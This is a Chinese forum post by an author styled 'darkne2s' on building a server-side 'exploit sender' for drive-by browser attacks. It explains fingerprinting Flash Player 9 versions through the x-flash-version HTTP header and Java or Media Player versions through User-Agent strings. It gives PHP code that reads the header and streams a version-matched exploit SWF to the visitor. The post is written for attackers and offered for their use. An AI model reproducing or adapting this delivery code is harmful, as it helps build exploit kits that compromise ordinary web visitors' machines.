作者:darkne2s
来源:大能寺
好像大牛些都有flash exp了.不过10个人有9个人说不好用。这出乎我的意料。按道理说这个不是人的漏洞应该很好用才是。而且我也经常不定期的收集世界各地的user agent和OS,activex情况.
flash我搜集的情况是超过300台的机器里面在使用flash9-9e的winxp有超过90%.
我看到流传的flash exp要么是用swf来判断版本.要么用js.这样都不是很保险.
其实在Flash 播放flash的时候会发送flash version 的HTTP 头。
x-flash-version,版本号是9,0,16,0这样的.
define(“Flash9”,’9,0,16,0′);
define(“Flash9b”,’9,0,28,0′);
define(“Flash9d”,’9,0,47,0′);
define(“Flash9c”,’9,0,45,0′);
define(“Flash9e”,’9,0,115,0′);
所以可以在php里来判断flash version.而且我估计以后的IE方面的网马都要趋于放于SERVER端。毕竟用JS什么的太不保险。在上次某个漏洞的时候,我开始用php来做 exploit sender.经过不断积累,发现用php做exploit sender确实好处多多。
比如java和media player会在user-agent发送版本等等.
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_05
User-Agent: Windows-Media-Player/11.0.5721.5230
等我有时间,我想分享一下php 作为exploit sender的一些心得.
if(isset($_SERVER[‘HTTP_X_FLASH_VERSION’]))
{
$version = $_SERVER[‘HTTP_X_FLASH_VERSION’];
}else
{
exit();
}
这样就可以判断flash的准确版本.
当然输出得这样:
$exp = knowflashversion(knowversion(),$version);
$filehowbig =filesize($exp);
setcookie(“phpsession”, “xxxx”,time()+43200);
header(“Content-length: $filehowbig”);
header(‘Content-type: application/x-shockwave-flash’);
//header(‘Content-encoding: gzip’);
readfile($exp);
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论